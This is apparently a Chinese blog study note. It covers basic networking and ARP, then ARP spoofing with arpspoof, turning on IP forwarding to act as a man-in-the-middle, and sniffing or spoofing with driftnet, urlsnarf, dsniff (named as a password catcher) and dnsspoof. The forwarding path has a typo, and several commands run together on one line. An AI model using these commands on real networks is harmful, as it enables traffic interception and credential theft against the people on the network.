基础网络知识
-
二、三层地址
-
IP网络到网络
-
MAC主机到主机
-
交换机与HUB
-
HUB全端口转发
-
交换机根据学习地址转发
-
混杂模式抓包
-
ARP协议
-
免费ARP
-
基于广播学习
-
以太网头、ARP头
-
请求、响应相对独立
-
基于传闻的协议
ARP欺骗
arpspoof
arpspoof -t 1.1.1.1 -r 2.2.2.2
- 被arp欺骗的PC是不能够上网的,如果想让受害者能够上网,需要开启转发功能。此时就是一个中间人的角色
echo 1 > /proc/sys/net/ipv4/ip_forwaed ##开启IP转发
ARP欺骗成功之后,就可以进行网络嗅探;
网络嗅探
- 接下来就可以通过抓包软件去抓包了,或者kali也有一些其他的抓包命令
driftnet -i eth0 -a -d tempdir -s ##将受害者看到的图片和声音文件保存到tmpdir目录下
webspy -i eth0 1.1.1.10
urlsnarf -i eth0 #记录详细请求过程dsniff -i eth0 -m ##这是一个专门记录密码的抓包工具dnsspoof -i eth0 -f /usr/share/dnsiff/dnsspoof.hosts ##DNS欺骗
```
版权声明:本文为weixin_42952508原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。